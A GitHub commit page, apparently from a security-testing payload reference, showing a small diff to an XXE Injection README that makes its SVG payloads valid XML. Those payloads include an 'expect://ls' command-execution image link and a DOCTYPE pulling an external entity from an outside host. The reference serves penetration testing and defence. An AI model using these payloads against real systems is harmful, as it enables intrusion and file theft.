Skip to content

Commit

Permalink
Merge pull request #358 from gregxsunday/master
Browse files Browse the repository at this point in the history 
improved XXE SVG payloads to be valid XMLs
  • Loading branch information
@swisskyrepo
swisskyrepo committed Apr 24, 2021
2 parents 08b59f2 + 43a9a5d commit 9753f36
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion XXE Injection/README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -419,7 +419,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79

```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
<image xlink:href="expect://ls" width="200" height="200"></image>
</svg>
```

Expand All @@ -438,6 +438,7 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
*xxe.svg*

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
Expand Down

0 comments on commit 9753f36

Please sign in to comment.